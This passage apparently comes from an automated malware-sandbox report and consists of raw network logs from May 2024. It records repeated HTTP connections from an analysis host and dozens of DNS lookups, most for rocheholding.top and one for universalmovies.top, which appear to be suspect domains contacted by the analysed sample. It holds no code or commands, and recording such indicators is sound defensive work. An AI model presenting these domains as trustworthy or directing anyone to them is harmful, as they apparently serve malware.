                      May 23, 2024 20:19:09.616430044 CEST8049251188.114.96.3192.168.2.22
                      May 23, 2024 20:19:09.616514921 CEST4925180192.168.2.22188.114.96.3
                      May 23, 2024 20:19:09.663424015 CEST8049251188.114.96.3192.168.2.22
                      May 23, 2024 20:19:09.934326887 CEST4925280192.168.2.22188.114.96.3
                      May 23, 2024 20:19:09.942114115 CEST8049252188.114.96.3192.168.2.22
                      May 23, 2024 20:19:09.942187071 CEST4925280192.168.2.22188.114.96.3
                      May 23, 2024 20:19:09.943896055 CEST4925280192.168.2.22188.114.96.3
                      May 23, 2024 20:19:09.995361090 CEST8049252188.114.96.3192.168.2.22
                      May 23, 2024 20:19:09.995471954 CEST4925280192.168.2.22188.114.96.3
                      May 23, 2024 20:19:10.003531933 CEST8049252188.114.96.3192.168.2.22
                      May 23, 2024 20:19:10.580454111 CEST8049252188.114.96.3192.168.2.22
                      May 23, 2024 20:19:10.580637932 CEST4925280192.168.2.22188.114.96.3
                      May 23, 2024 20:19:10.585222006 CEST8049252188.114.96.3192.168.2.22
                      May 23, 2024 20:19:10.585335970 CEST4925280192.168.2.22188.114.96.3
                      May 23, 2024 20:19:10.593084097 CEST8049252188.114.96.3192.168.2.22
                      May 23, 2024 20:19:10.733789921 CEST4925380192.168.2.22188.114.97.3
                      May 23, 2024 20:19:10.738866091 CEST8049253188.114.97.3192.168.2.22
                      May 23, 2024 20:19:10.738944054 CEST4925380192.168.2.22188.114.97.3
                      May 23, 2024 20:19:10.741295099 CEST4925380192.168.2.22188.114.97.3
                      May 23, 2024 20:19:10.804503918 CEST8049253188.114.97.3192.168.2.22
                      May 23, 2024 20:19:10.804636955 CEST4925380192.168.2.22188.114.97.3
                      May 23, 2024 20:19:10.855389118 CEST8049253188.114.97.3192.168.2.22
                      May 23, 2024 20:19:11.511003971 CEST8049253188.114.97.3192.168.2.22
                      May 23, 2024 20:19:11.511153936 CEST4925380192.168.2.22188.114.97.3
                      May 23, 2024 20:19:11.515736103 CEST8049253188.114.97.3192.168.2.22
                      May 23, 2024 20:19:11.515921116 CEST4925380192.168.2.22188.114.97.3
                      May 23, 2024 20:19:11.563514948 CEST8049253188.114.97.3192.168.2.22
                      May 23, 2024 20:19:11.669047117 CEST4925480192.168.2.22188.114.96.9
                      May 23, 2024 20:19:11.674108028 CEST8049254188.114.96.9192.168.2.22
                      May 23, 2024 20:19:11.674174070 CEST4925480192.168.2.22188.114.96.9
                      May 23, 2024 20:19:11.675766945 CEST4925480192.168.2.22188.114.96.9
                      May 23, 2024 20:19:11.727400064 CEST8049254188.114.96.9192.168.2.22
                      May 23, 2024 20:19:11.727550030 CEST4925480192.168.2.22188.114.96.9
                      May 23, 2024 20:19:11.732546091 CEST8049254188.114.96.9192.168.2.22
                      May 23, 2024 20:19:12.451481104 CEST8049254188.114.96.9192.168.2.22
                      May 23, 2024 20:19:12.451514006 CEST8049254188.114.96.9192.168.2.22
                      May 23, 2024 20:19:12.451539993 CEST8049254188.114.96.9192.168.2.22
                      May 23, 2024 20:19:12.451611042 CEST4925480192.168.2.22188.114.96.9
                      May 23, 2024 20:19:12.451690912 CEST4925480192.168.2.22188.114.96.9
                      May 23, 2024 20:19:12.451690912 CEST4925480192.168.2.22188.114.96.9
                      May 23, 2024 20:19:12.460077047 CEST8049254188.114.96.9192.168.2.22
                      May 23, 2024 20:19:12.590276957 CEST4925580192.168.2.22188.114.96.3
                      May 23, 2024 20:19:12.595376015 CEST8049255188.114.96.3192.168.2.22
                      May 23, 2024 20:19:12.595508099 CEST4925580192.168.2.22188.114.96.3
                      May 23, 2024 20:19:12.597934008 CEST4925580192.168.2.22188.114.96.3
                      May 23, 2024 20:19:12.651973963 CEST8049255188.114.96.3192.168.2.22
                      May 23, 2024 20:19:12.652106047 CEST4925580192.168.2.22188.114.96.3
                      May 23, 2024 20:19:12.657162905 CEST8049255188.114.96.3192.168.2.22
                      May 23, 2024 20:19:13.233325958 CEST8049255188.114.96.3192.168.2.22
                      May 23, 2024 20:19:13.233449936 CEST4925580192.168.2.22188.114.96.3
                      May 23, 2024 20:19:13.238015890 CEST8049255188.114.96.3192.168.2.22
                      May 23, 2024 20:19:13.238086939 CEST4925580192.168.2.22188.114.96.3
                      May 23, 2024 20:19:13.243040085 CEST8049255188.114.96.3192.168.2.22
                      May 23, 2024 20:19:13.392312050 CEST4925680192.168.2.22188.114.97.3
                      May 23, 2024 20:19:13.397459030 CEST8049256188.114.97.3192.168.2.22
                      May 23, 2024 20:19:13.397530079 CEST4925680192.168.2.22188.114.97.3
                      May 23, 2024 20:19:13.398916960 CEST4925680192.168.2.22188.114.97.3
                      May 23, 2024 20:19:13.447361946 CEST8049256188.114.97.3192.168.2.22
                      May 23, 2024 20:19:13.447422981 CEST4925680192.168.2.22188.114.97.3
                      May 23, 2024 20:19:13.453330994 CEST8049256188.114.97.3192.168.2.22
                      May 23, 2024 20:19:14.112435102 CEST8049256188.114.97.3192.168.2.22
                      May 23, 2024 20:19:14.112536907 CEST4925680192.168.2.22188.114.97.3
                      May 23, 2024 20:19:14.117161036 CEST8049256188.114.97.3192.168.2.22
                      May 23, 2024 20:19:14.117264986 CEST4925680192.168.2.22188.114.97.3
                      May 23, 2024 20:19:14.163089037 CEST8049256188.114.97.3192.168.2.22
                      May 23, 2024 20:19:14.270569086 CEST4925780192.168.2.22188.114.96.3
                      May 23, 2024 20:19:14.275605917 CEST8049257188.114.96.3192.168.2.22
                      May 23, 2024 20:19:14.275671959 CEST4925780192.168.2.22188.114.96.3
                      May 23, 2024 20:19:14.278026104 CEST4925780192.168.2.22188.114.96.3
                      May 23, 2024 20:19:14.327255011 CEST8049257188.114.96.3192.168.2.22
                      May 23, 2024 20:19:14.327351093 CEST4925780192.168.2.22188.114.96.3
                      May 23, 2024 20:19:14.332542896 CEST8049257188.114.96.3192.168.2.22
                      May 23, 2024 20:19:14.904860973 CEST8049257188.114.96.3192.168.2.22
                      May 23, 2024 20:19:14.909537077 CEST8049257188.114.96.3192.168.2.22
                      May 23, 2024 20:19:14.909733057 CEST4925780192.168.2.22188.114.96.3
                      May 23, 2024 20:19:14.998275995 CEST4925780192.168.2.22188.114.96.3
                      May 23, 2024 20:19:15.003278971 CEST8049257188.114.96.3192.168.2.22
                      May 23, 2024 20:19:15.177755117 CEST4925880192.168.2.22188.114.96.3
                      May 23, 2024 20:19:15.182832956 CEST8049258188.114.96.3192.168.2.22
                      May 23, 2024 20:19:15.183038950 CEST4925880192.168.2.22188.114.96.3
                      May 23, 2024 20:19:15.184596062 CEST4925880192.168.2.22188.114.96.3
                      May 23, 2024 20:19:15.236504078 CEST8049258188.114.96.3192.168.2.22
                      May 23, 2024 20:19:15.236584902 CEST4925880192.168.2.22188.114.96.3
                      May 23, 2024 20:19:15.244792938 CEST8049258188.114.96.3192.168.2.22
                      May 23, 2024 20:19:15.842974901 CEST8049258188.114.96.3192.168.2.22
                      May 23, 2024 20:19:15.843202114 CEST4925880192.168.2.22188.114.96.3
                      May 23, 2024 20:19:15.847676039 CEST8049258188.114.96.3192.168.2.22
                      May 23, 2024 20:19:15.847729921 CEST4925880192.168.2.22188.114.96.3
                      May 23, 2024 20:19:15.895241976 CEST8049258188.114.96.3192.168.2.22
                      May 23, 2024 20:19:15.999243021 CEST4925980192.168.2.22188.114.97.3
                      May 23, 2024 20:19:16.004223108 CEST8049259188.114.97.3192.168.2.22
                      May 23, 2024 20:19:16.004283905 CEST4925980192.168.2.22188.114.97.3
                      May 23, 2024 20:19:16.005968094 CEST4925980192.168.2.22188.114.97.3
                      May 23, 2024 20:19:16.055294037 CEST8049259188.114.97.3192.168.2.22
                      May 23, 2024 20:19:16.055433035 CEST4925980192.168.2.22188.114.97.3
                      May 23, 2024 20:19:16.060416937 CEST8049259188.114.97.3192.168.2.22
                      May 23, 2024 20:19:16.725969076 CEST8049259188.114.97.3192.168.2.22
                      May 23, 2024 20:19:16.726129055 CEST4925980192.168.2.22188.114.97.3
                      May 23, 2024 20:19:16.732117891 CEST8049259188.114.97.3192.168.2.22
                      May 23, 2024 20:19:16.732217073 CEST4925980192.168.2.22188.114.97.3
                      May 23, 2024 20:19:16.779182911 CEST8049259188.114.97.3192.168.2.22
                      May 23, 2024 20:19:16.874466896 CEST4926080192.168.2.22188.114.96.3
                      May 23, 2024 20:19:16.879641056 CEST8049260188.114.96.3192.168.2.22
                      May 23, 2024 20:19:16.879726887 CEST4926080192.168.2.22188.114.96.3
                      May 23, 2024 20:19:16.882044077 CEST4926080192.168.2.22188.114.96.3
                      May 23, 2024 20:19:16.932055950 CEST8049260188.114.96.3192.168.2.22
                      May 23, 2024 20:19:16.932179928 CEST4926080192.168.2.22188.114.96.3
                      May 23, 2024 20:19:16.942044020 CEST8049260188.114.96.3192.168.2.22
                      May 23, 2024 20:19:17.508523941 CEST8049260188.114.96.3192.168.2.22
                      May 23, 2024 20:19:17.508900881 CEST4926080192.168.2.22188.114.96.3
                      May 23, 2024 20:19:17.513153076 CEST8049260188.114.96.3192.168.2.22
                      May 23, 2024 20:19:17.513211012 CEST4926080192.168.2.22188.114.96.3
                      May 23, 2024 20:19:17.559726000 CEST8049260188.114.96.3192.168.2.22
                      May 23, 2024 20:19:17.645674944 CEST4926180192.168.2.22188.114.96.3
                      May 23, 2024 20:19:17.651544094 CEST8049261188.114.96.3192.168.2.22
                      May 23, 2024 20:19:17.651593924 CEST4926180192.168.2.22188.114.96.3
                      May 23, 2024 20:19:17.653378963 CEST4926180192.168.2.22188.114.96.3
                      May 23, 2024 20:19:17.709343910 CEST8049261188.114.96.3192.168.2.22
                      May 23, 2024 20:19:17.709537983 CEST4926180192.168.2.22188.114.96.3
                      May 23, 2024 20:19:17.714663029 CEST8049261188.114.96.3192.168.2.22
                      May 23, 2024 20:19:18.284159899 CEST8049261188.114.96.3192.168.2.22
                      May 23, 2024 20:19:18.284281969 CEST4926180192.168.2.22188.114.96.3
                      May 23, 2024 20:19:18.291275978 CEST8049261188.114.96.3192.168.2.22
                      May 23, 2024 20:19:18.291353941 CEST4926180192.168.2.22188.114.96.3
                      May 23, 2024 20:19:18.339612007 CEST8049261188.114.96.3192.168.2.22
                      May 23, 2024 20:19:18.432854891 CEST4926280192.168.2.22188.114.96.3
                      May 23, 2024 20:19:18.439290047 CEST8049262188.114.96.3192.168.2.22
                      May 23, 2024 20:19:18.439377069 CEST4926280192.168.2.22188.114.96.3
                      May 23, 2024 20:19:18.441020966 CEST4926280192.168.2.22188.114.96.3
                      May 23, 2024 20:19:18.492142916 CEST8049262188.114.96.3192.168.2.22
                      May 23, 2024 20:19:18.492275000 CEST4926280192.168.2.22188.114.96.3
                      May 23, 2024 20:19:18.499218941 CEST8049262188.114.96.3192.168.2.22
                      TimestampSource PortDest PortSource IPDest IP
                      May 23, 2024 20:17:25.248487949 CEST5456253192.168.2.228.8.8.8
                      May 23, 2024 20:17:25.261668921 CEST53545628.8.8.8192.168.2.22
                      May 23, 2024 20:17:35.013319016 CEST5291753192.168.2.228.8.8.8
                      May 23, 2024 20:17:35.106868029 CEST53529178.8.8.8192.168.2.22
                      May 23, 2024 20:17:36.471962929 CEST6275153192.168.2.228.8.8.8
                      May 23, 2024 20:17:36.575613022 CEST53627518.8.8.8192.168.2.22
                      May 23, 2024 20:17:37.973797083 CEST5789353192.168.2.228.8.8.8
                      May 23, 2024 20:17:38.070122957 CEST53578938.8.8.8192.168.2.22
                      May 23, 2024 20:17:39.389893055 CEST5482153192.168.2.228.8.8.8
                      May 23, 2024 20:17:39.396862984 CEST53548218.8.8.8192.168.2.22
                      May 23, 2024 20:17:40.787965059 CEST5471953192.168.2.228.8.8.8
                      May 23, 2024 20:17:40.795311928 CEST53547198.8.8.8192.168.2.22
                      May 23, 2024 20:17:41.812153101 CEST4988153192.168.2.228.8.8.8
                      May 23, 2024 20:17:42.108488083 CEST53498818.8.8.8192.168.2.22
                      May 23, 2024 20:17:43.075829983 CEST5499853192.168.2.228.8.8.8
                      May 23, 2024 20:17:43.175477982 CEST53549988.8.8.8192.168.2.22
                      May 23, 2024 20:17:44.091836929 CEST5278153192.168.2.228.8.8.8
                      May 23, 2024 20:17:44.099220991 CEST53527818.8.8.8192.168.2.22
                      May 23, 2024 20:17:45.054994106 CEST6392653192.168.2.228.8.8.8
                      May 23, 2024 20:17:45.147840023 CEST53639268.8.8.8192.168.2.22
                      May 23, 2024 20:17:46.019932032 CEST6551053192.168.2.228.8.8.8
                      May 23, 2024 20:17:46.325120926 CEST53655108.8.8.8192.168.2.22
                      May 23, 2024 20:17:47.193533897 CEST6267253192.168.2.228.8.8.8
                      May 23, 2024 20:17:47.201168060 CEST53626728.8.8.8192.168.2.22
                      May 23, 2024 20:17:48.073056936 CEST5647553192.168.2.228.8.8.8
                      May 23, 2024 20:17:48.080511093 CEST53564758.8.8.8192.168.2.22
                      May 23, 2024 20:17:49.040054083 CEST4938453192.168.2.228.8.8.8
                      May 23, 2024 20:17:49.140233040 CEST53493848.8.8.8192.168.2.22
                      May 23, 2024 20:17:50.044065952 CEST5484253192.168.2.228.8.8.8
                      May 23, 2024 20:17:50.051635981 CEST53548428.8.8.8192.168.2.22
                      May 23, 2024 20:17:50.930351019 CEST5810553192.168.2.228.8.8.8
                      May 23, 2024 20:17:50.937587023 CEST53581058.8.8.8192.168.2.22
                      May 23, 2024 20:17:51.787807941 CEST6492853192.168.2.228.8.8.8
                      May 23, 2024 20:17:51.796273947 CEST53649288.8.8.8192.168.2.22
                      May 23, 2024 20:17:52.681253910 CEST5739053192.168.2.228.8.8.8
                      May 23, 2024 20:17:52.687720060 CEST53573908.8.8.8192.168.2.22
                      May 23, 2024 20:17:53.955564022 CEST5809553192.168.2.228.8.8.8
                      May 23, 2024 20:17:53.967643023 CEST53580958.8.8.8192.168.2.22
                      May 23, 2024 20:17:56.032198906 CEST5426153192.168.2.228.8.8.8
                      May 23, 2024 20:17:56.039443970 CEST53542618.8.8.8192.168.2.22
                      May 23, 2024 20:17:56.963481903 CEST6050753192.168.2.228.8.8.8
                      May 23, 2024 20:17:56.970849037 CEST53605078.8.8.8192.168.2.22
                      May 23, 2024 20:17:57.904227018 CEST5044653192.168.2.228.8.8.8
                      May 23, 2024 20:17:57.912106991 CEST53504468.8.8.8192.168.2.22
                      May 23, 2024 20:17:58.806338072 CEST5593953192.168.2.228.8.8.8
                      May 23, 2024 20:17:58.813364029 CEST53559398.8.8.8192.168.2.22
                      May 23, 2024 20:17:59.746988058 CEST4960853192.168.2.228.8.8.8
                      May 23, 2024 20:17:59.754622936 CEST53496088.8.8.8192.168.2.22
                      May 23, 2024 20:18:00.717585087 CEST6148653192.168.2.228.8.8.8
                      May 23, 2024 20:18:00.729857922 CEST53614868.8.8.8192.168.2.22
                      May 23, 2024 20:18:01.529481888 CEST6245353192.168.2.228.8.8.8
                      May 23, 2024 20:18:01.547060966 CEST53624538.8.8.8192.168.2.22
                      May 23, 2024 20:18:02.352221966 CEST5056853192.168.2.228.8.8.8
                      May 23, 2024 20:18:02.361994028 CEST53505688.8.8.8192.168.2.22
                      May 23, 2024 20:18:03.263438940 CEST6146753192.168.2.228.8.8.8
                      May 23, 2024 20:18:03.271300077 CEST53614678.8.8.8192.168.2.22
                      May 23, 2024 20:18:04.145406961 CEST6161853192.168.2.228.8.8.8
                      May 23, 2024 20:18:04.162955999 CEST53616188.8.8.8192.168.2.22
                      May 23, 2024 20:18:06.025861979 CEST5442253192.168.2.228.8.8.8
                      May 23, 2024 20:18:06.036633968 CEST53544228.8.8.8192.168.2.22
                      May 23, 2024 20:18:07.059591055 CEST5207453192.168.2.228.8.8.8
                      May 23, 2024 20:18:07.067257881 CEST53520748.8.8.8192.168.2.22
                      May 23, 2024 20:18:07.975244045 CEST5033753192.168.2.228.8.8.8
                      May 23, 2024 20:18:07.982644081 CEST53503378.8.8.8192.168.2.22
                      May 23, 2024 20:18:08.933924913 CEST6182653192.168.2.228.8.8.8
                      May 23, 2024 20:18:08.941198111 CEST53618268.8.8.8192.168.2.22
                      May 23, 2024 20:18:09.836658001 CEST5632953192.168.2.228.8.8.8
                      May 23, 2024 20:18:09.852065086 CEST53563298.8.8.8192.168.2.22
                      May 23, 2024 20:18:10.664048910 CEST6346953192.168.2.228.8.8.8
                      May 23, 2024 20:18:10.671595097 CEST53634698.8.8.8192.168.2.22
                      May 23, 2024 20:18:11.700437069 CEST5944753192.168.2.228.8.8.8
                      May 23, 2024 20:18:11.707437992 CEST53594478.8.8.8192.168.2.22
                      May 23, 2024 20:18:16.256679058 CEST5182853192.168.2.228.8.8.8
                      May 23, 2024 20:18:16.263711929 CEST53518288.8.8.8192.168.2.22
                      May 23, 2024 20:18:17.142232895 CEST5340653192.168.2.228.8.8.8
                      May 23, 2024 20:18:17.149425030 CEST53534068.8.8.8192.168.2.22
                      May 23, 2024 20:18:18.062695980 CEST5634553192.168.2.228.8.8.8
                      May 23, 2024 20:18:18.070195913 CEST53563458.8.8.8192.168.2.22
                      May 23, 2024 20:18:18.956516027 CEST5187053192.168.2.228.8.8.8
                      May 23, 2024 20:18:18.964488983 CEST53518708.8.8.8192.168.2.22
                      May 23, 2024 20:18:19.968893051 CEST6500953192.168.2.228.8.8.8
                      May 23, 2024 20:18:19.979517937 CEST53650098.8.8.8192.168.2.22
                      May 23, 2024 20:18:20.867146969 CEST6495653192.168.2.228.8.8.8
                      May 23, 2024 20:18:20.875355959 CEST53649568.8.8.8192.168.2.22
                      May 23, 2024 20:18:21.821590900 CEST5452153192.168.2.228.8.8.8
                      May 23, 2024 20:18:21.829258919 CEST53545218.8.8.8192.168.2.22
                      May 23, 2024 20:18:22.757569075 CEST4975053192.168.2.228.8.8.8
                      May 23, 2024 20:18:22.764985085 CEST53497508.8.8.8192.168.2.22
                      May 23, 2024 20:18:23.657824039 CEST6468753192.168.2.228.8.8.8
                      May 23, 2024 20:18:23.666145086 CEST53646878.8.8.8192.168.2.22
                      May 23, 2024 20:18:24.550265074 CEST6508453192.168.2.228.8.8.8
                      May 23, 2024 20:18:24.557745934 CEST53650848.8.8.8192.168.2.22
                      May 23, 2024 20:18:25.467520952 CEST6337353192.168.2.228.8.8.8
                      May 23, 2024 20:18:25.476716042 CEST53633738.8.8.8192.168.2.22
                      May 23, 2024 20:18:26.579898119 CEST5620753192.168.2.228.8.8.8
                      May 23, 2024 20:18:26.587213039 CEST53562078.8.8.8192.168.2.22
                      May 23, 2024 20:18:27.495337009 CEST5195553192.168.2.228.8.8.8
                      May 23, 2024 20:18:27.505067110 CEST53519558.8.8.8192.168.2.22
                      May 23, 2024 20:18:28.359879017 CEST5897153192.168.2.228.8.8.8
                      May 23, 2024 20:18:28.368410110 CEST53589718.8.8.8192.168.2.22
                      May 23, 2024 20:18:29.273845911 CEST5101453192.168.2.228.8.8.8
                      May 23, 2024 20:18:29.286659002 CEST53510148.8.8.8192.168.2.22
                      May 23, 2024 20:18:30.078829050 CEST4969053192.168.2.228.8.8.8
                      May 23, 2024 20:18:30.091368914 CEST53496908.8.8.8192.168.2.22
                      May 23, 2024 20:18:30.942620993 CEST6016953192.168.2.228.8.8.8
                      May 23, 2024 20:18:30.949893951 CEST53601698.8.8.8192.168.2.22
                      May 23, 2024 20:18:31.696842909 CEST5306053192.168.2.228.8.8.8
                      May 23, 2024 20:18:31.704309940 CEST53530608.8.8.8192.168.2.22
                      May 23, 2024 20:18:37.662822962 CEST4994953192.168.2.228.8.8.8
                      May 23, 2024 20:18:37.670048952 CEST53499498.8.8.8192.168.2.22
                      May 23, 2024 20:18:38.545434952 CEST5402753192.168.2.228.8.8.8
                      May 23, 2024 20:18:38.552854061 CEST53540278.8.8.8192.168.2.22
                      May 23, 2024 20:18:39.366585016 CEST6395053192.168.2.228.8.8.8
                      May 23, 2024 20:18:39.374072075 CEST53639508.8.8.8192.168.2.22
                      May 23, 2024 20:18:40.258249998 CEST5825753192.168.2.228.8.8.8
                      May 23, 2024 20:18:40.266540051 CEST53582578.8.8.8192.168.2.22
                      May 23, 2024 20:18:41.194926023 CEST5473853192.168.2.228.8.8.8
                      May 23, 2024 20:18:41.202218056 CEST53547388.8.8.8192.168.2.22
                      May 23, 2024 20:18:41.964387894 CEST4947853192.168.2.228.8.8.8
                      May 23, 2024 20:18:41.971498966 CEST53494788.8.8.8192.168.2.22
                      May 23, 2024 20:18:42.894562006 CEST4928853192.168.2.228.8.8.8
                      May 23, 2024 20:18:42.906310081 CEST53492888.8.8.8192.168.2.22
                      May 23, 2024 20:18:43.769901991 CEST6159853192.168.2.228.8.8.8
                      May 23, 2024 20:18:43.776977062 CEST53615988.8.8.8192.168.2.22
                      May 23, 2024 20:18:44.703257084 CEST5875453192.168.2.228.8.8.8
                      May 23, 2024 20:18:44.719610929 CEST53587548.8.8.8192.168.2.22
                      May 23, 2024 20:18:45.610503912 CEST4922653192.168.2.228.8.8.8
                      May 23, 2024 20:18:45.617742062 CEST53492268.8.8.8192.168.2.22
                      May 23, 2024 20:18:46.503257036 CEST5469553192.168.2.228.8.8.8
                      May 23, 2024 20:18:46.510543108 CEST53546958.8.8.8192.168.2.22
                      May 23, 2024 20:18:47.426409006 CEST6160153192.168.2.228.8.8.8
                      May 23, 2024 20:18:47.433036089 CEST53616018.8.8.8192.168.2.22
                      May 23, 2024 20:18:48.336954117 CEST5461553192.168.2.228.8.8.8
                      May 23, 2024 20:18:48.350919962 CEST53546158.8.8.8192.168.2.22
                      May 23, 2024 20:18:49.150943041 CEST5495053192.168.2.228.8.8.8
                      May 23, 2024 20:18:49.158883095 CEST53549508.8.8.8192.168.2.22
                      May 23, 2024 20:18:50.047169924 CEST6421553192.168.2.228.8.8.8
                      May 23, 2024 20:18:50.054630041 CEST53642158.8.8.8192.168.2.22
                      May 23, 2024 20:18:51.063582897 CEST5960453192.168.2.228.8.8.8
                      May 23, 2024 20:18:51.078370094 CEST53596048.8.8.8192.168.2.22
                      May 23, 2024 20:18:52.355403900 CEST4952053192.168.2.228.8.8.8
                      May 23, 2024 20:18:52.378161907 CEST53495208.8.8.8192.168.2.22
                      May 23, 2024 20:18:53.327960014 CEST5303153192.168.2.228.8.8.8
                      May 23, 2024 20:18:53.335199118 CEST53530318.8.8.8192.168.2.22
                      May 23, 2024 20:18:54.296926975 CEST5311253192.168.2.228.8.8.8
                      May 23, 2024 20:18:54.304356098 CEST53531128.8.8.8192.168.2.22
                      May 23, 2024 20:18:55.205929995 CEST6508053192.168.2.228.8.8.8
                      May 23, 2024 20:18:55.217312098 CEST53650808.8.8.8192.168.2.22
                      May 23, 2024 20:18:56.074978113 CEST5070253192.168.2.228.8.8.8
                      May 23, 2024 20:18:56.082659960 CEST53507028.8.8.8192.168.2.22
                      May 23, 2024 20:18:56.889071941 CEST5308953192.168.2.228.8.8.8
                      May 23, 2024 20:18:56.896380901 CEST53530898.8.8.8192.168.2.22
                      May 23, 2024 20:18:57.777982950 CEST5195153192.168.2.228.8.8.8
                      May 23, 2024 20:18:57.784815073 CEST53519518.8.8.8192.168.2.22
                      May 23, 2024 20:18:58.578927994 CEST6154953192.168.2.228.8.8.8
                      May 23, 2024 20:18:58.585558891 CEST53615498.8.8.8192.168.2.22
                      May 23, 2024 20:18:59.505765915 CEST5799853192.168.2.228.8.8.8
                      May 23, 2024 20:18:59.513384104 CEST53579988.8.8.8192.168.2.22
                      May 23, 2024 20:19:00.410475969 CEST6243953192.168.2.228.8.8.8
                      May 23, 2024 20:19:00.417927027 CEST53624398.8.8.8192.168.2.22
                      May 23, 2024 20:19:01.344558954 CEST5943253192.168.2.228.8.8.8
                      May 23, 2024 20:19:01.357151985 CEST53594328.8.8.8192.168.2.22
                      May 23, 2024 20:19:02.166636944 CEST5591053192.168.2.228.8.8.8
                      May 23, 2024 20:19:02.176846981 CEST53559108.8.8.8192.168.2.22
                      May 23, 2024 20:19:03.302340031 CEST6156453192.168.2.228.8.8.8
                      May 23, 2024 20:19:03.309638977 CEST53615648.8.8.8192.168.2.22
                      May 23, 2024 20:19:04.210112095 CEST5138453192.168.2.228.8.8.8
                      May 23, 2024 20:19:04.219594955 CEST53513848.8.8.8192.168.2.22
                      May 23, 2024 20:19:05.117906094 CEST5378553192.168.2.228.8.8.8
                      May 23, 2024 20:19:05.125282049 CEST53537858.8.8.8192.168.2.22
                      May 23, 2024 20:19:06.049398899 CEST5527753192.168.2.228.8.8.8
                      May 23, 2024 20:19:06.057423115 CEST53552778.8.8.8192.168.2.22
                      May 23, 2024 20:19:07.004072905 CEST5118353192.168.2.228.8.8.8
                      May 23, 2024 20:19:07.011307001 CEST53511838.8.8.8192.168.2.22
                      May 23, 2024 20:19:07.874579906 CEST5702753192.168.2.228.8.8.8
                      May 23, 2024 20:19:07.881956100 CEST53570278.8.8.8192.168.2.22
                      May 23, 2024 20:19:08.815145016 CEST5038053192.168.2.228.8.8.8
                      May 23, 2024 20:19:08.846313000 CEST53503808.8.8.8192.168.2.22
                      May 23, 2024 20:19:09.904633999 CEST5615653192.168.2.228.8.8.8
                      May 23, 2024 20:19:09.912739038 CEST53561568.8.8.8192.168.2.22
                      May 23, 2024 20:19:10.723278046 CEST6097153192.168.2.228.8.8.8
                      May 23, 2024 20:19:10.733256102 CEST53609718.8.8.8192.168.2.22
                      May 23, 2024 20:19:11.660978079 CEST5630853192.168.2.228.8.8.8
                      May 23, 2024 20:19:11.668661118 CEST53563088.8.8.8192.168.2.22
                      May 23, 2024 20:19:12.582365990 CEST5126853192.168.2.228.8.8.8
                      May 23, 2024 20:19:12.589925051 CEST53512688.8.8.8192.168.2.22
                      May 23, 2024 20:19:13.381937981 CEST5947553192.168.2.228.8.8.8
                      May 23, 2024 20:19:13.391798019 CEST53594758.8.8.8192.168.2.22
                      May 23, 2024 20:19:14.262255907 CEST6293053192.168.2.228.8.8.8
                      May 23, 2024 20:19:14.269871950 CEST53629308.8.8.8192.168.2.22
                      May 23, 2024 20:19:15.169820070 CEST6100853192.168.2.228.8.8.8
                      May 23, 2024 20:19:15.177254915 CEST53610088.8.8.8192.168.2.22
                      May 23, 2024 20:19:15.991466999 CEST5951453192.168.2.228.8.8.8
                      May 23, 2024 20:19:15.998914003 CEST53595148.8.8.8192.168.2.22
                      May 23, 2024 20:19:16.866609097 CEST5307753192.168.2.228.8.8.8
                      May 23, 2024 20:19:16.873891115 CEST53530778.8.8.8192.168.2.22
                      May 23, 2024 20:19:17.638184071 CEST5318853192.168.2.228.8.8.8
                      May 23, 2024 20:19:17.645247936 CEST53531888.8.8.8192.168.2.22
                      May 23, 2024 20:19:18.425237894 CEST5433353192.168.2.228.8.8.8
                      May 23, 2024 20:19:18.432483912 CEST53543338.8.8.8192.168.2.22
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      May 23, 2024 20:17:25.248487949 CEST192.168.2.228.8.8.80x3c0cStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:35.013319016 CEST192.168.2.228.8.8.80xce84Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:36.471962929 CEST192.168.2.228.8.8.80x77b7Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:37.973797083 CEST192.168.2.228.8.8.80x1d8aStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:39.389893055 CEST192.168.2.228.8.8.80xbc91Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:40.787965059 CEST192.168.2.228.8.8.80xeb3dStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:41.812153101 CEST192.168.2.228.8.8.80x8573Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:43.075829983 CEST192.168.2.228.8.8.80x7dc0Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:44.091836929 CEST192.168.2.228.8.8.80x61ecStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:45.054994106 CEST192.168.2.228.8.8.80xa76Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:46.019932032 CEST192.168.2.228.8.8.80x59e8Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:47.193533897 CEST192.168.2.228.8.8.80xef97Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:48.073056936 CEST192.168.2.228.8.8.80xa16aStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:49.040054083 CEST192.168.2.228.8.8.80xfa26Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:50.044065952 CEST192.168.2.228.8.8.80x9e5bStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:50.930351019 CEST192.168.2.228.8.8.80x7e82Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:51.787807941 CEST192.168.2.228.8.8.80x55d9Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:52.681253910 CEST192.168.2.228.8.8.80x462bStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:53.955564022 CEST192.168.2.228.8.8.80xde7cStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:56.032198906 CEST192.168.2.228.8.8.80xd483Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:56.963481903 CEST192.168.2.228.8.8.80x6a2aStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
